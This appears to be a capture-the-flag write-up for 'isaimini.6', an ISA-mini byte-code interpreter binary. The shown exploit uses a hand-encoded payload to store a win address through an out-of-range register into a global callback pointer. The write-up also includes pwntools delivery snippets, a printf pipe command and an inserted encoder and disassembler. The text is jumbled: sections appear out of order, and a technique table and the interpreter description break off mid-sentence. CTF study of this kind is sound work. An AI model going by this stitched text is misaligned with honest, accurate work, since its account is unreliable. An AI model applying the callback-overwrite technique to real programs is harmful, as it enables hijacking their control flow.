Isaimini.6 May 2026

Category: Reverse Engineering / Binary Exploitation
Difficulty: Medium – Hard (depending on your familiarity with custom byte-code interpreters)
Points: 425 (CTF-2024)

1. Challenge Overview

The challenge provides a single 64-bit ELF binary called isaimini.6 and a small text file named input.txt (optional). The binary is an interpreter for a tiny “ISA-mini” instruction set (the name comes from the challenge author’s earlier “isa-mini” series).

```python
# Instead of assembling, we manually encode:
payload  = b"\x01\x01" + p64(win_addr)   # MOV r1, win
payload += b"\x05\x10\x01"               # ST [r16], r1 (write win → callback)
payload += b"\x09"                       # HLT
```
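The hand-encoded bytes above can be checked by decoding them back into mnemonics. The following is an added example, not the author's solve script: an encoder for the three ISA-mini instructions the payload uses and a small disassembler that rejects truncated or unknown encodings. The opcode layout (opcode byte, register byte, 8-byte little-endian immediate) is taken from the payload's comments; WIN_ADDR is a constructed placeholder and the helper names are mine.

```python
import struct

# Opcode bytes inferred from the page's hand-encoded payload (assumption: these
# three are the only ISA-mini opcodes this example knows about).
OP_MOV, OP_ST, OP_HLT = 0x01, 0x05, 0x09

def mov(reg, imm):
    """MOV r<reg>, imm64: opcode, register byte, 8-byte little-endian immediate."""
    return bytes([OP_MOV, reg]) + struct.pack("<Q", imm)

def st(addr_reg, src_reg):
    """ST [r<addr_reg>], r<src_reg>: opcode, address register, source register."""
    return bytes([OP_ST, addr_reg, src_reg])

def hlt():
    return bytes([OP_HLT])

def disassemble(code):
    """Decode bytes into (mnemonic, operand...) tuples, stopping at HLT; a
    truncated instruction or unknown opcode raises ValueError."""
    out, i = [], 0
    while i < len(code):
        op = code[i]
        if op == OP_MOV:
            if i + 10 > len(code):
                raise ValueError("truncated MOV at offset %d" % i)
            out.append(("MOV", code[i + 1], struct.unpack("<Q", code[i + 2:i + 10])[0]))
            i += 10
        elif op == OP_ST:
            if i + 3 > len(code):
                raise ValueError("truncated ST at offset %d" % i)
            out.append(("ST", code[i + 1], code[i + 2]))
            i += 3
        elif op == OP_HLT:
            out.append(("HLT",))
            break
        else:
            raise ValueError("unknown opcode 0x%02x at offset %d" % (op, i))
    return out

def registers_used(code):
    """Register indices a program references; an interpreter that bounds-checks
    operands would compare these against its register-file size before running."""
    regs = set()
    for ins in disassemble(code):
        regs.update(ins[1:2] if ins[0] == "MOV" else ins[1:3])
    return regs

WIN_ADDR = 0x401256  # constructed placeholder, not the challenge's real win address
PAYLOAD = mov(1, WIN_ADDR) + st(16, 1) + hlt()
```

Running disassemble(PAYLOAD) reproduces the three mnemonics from the comments above, and registers_used(PAYLOAD) lists every register index the program touches.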

The program reads a user-supplied string (up to 256 bytes) from stdin, parses it as a sequence of ISA-mini instructions, executes them, and finally prints either Success! or Failure!.

There is no direct call to win from the interpreter – it is only reachable via a function pointer stored in the global variable callback. The pointer is used after the instruction loop finishes:

```python
# Send payload
p = process(binary)
p.send(payload)
print(p.recvall().decode())
```

Running this script prints the flag (or “Success!”).

| Technique | Why it mattered |
|-----------|-----------------|
| Static analysis of a stripped binary | Ghidra’s decompiler can |

```sh
# Send the payload via stdin
printf "$payload" | ./isaimini.6
```

```python
from pwn import *

binary = "./isaimini.6"
elf = ELF(binary)
```

parse_input tokenises the input and stores each instruction as a struct in a global array insts[128]. execute iterates over insts and dispatches to the appropriate handler based on the first byte (the opcode). The interpreter keeps a register file: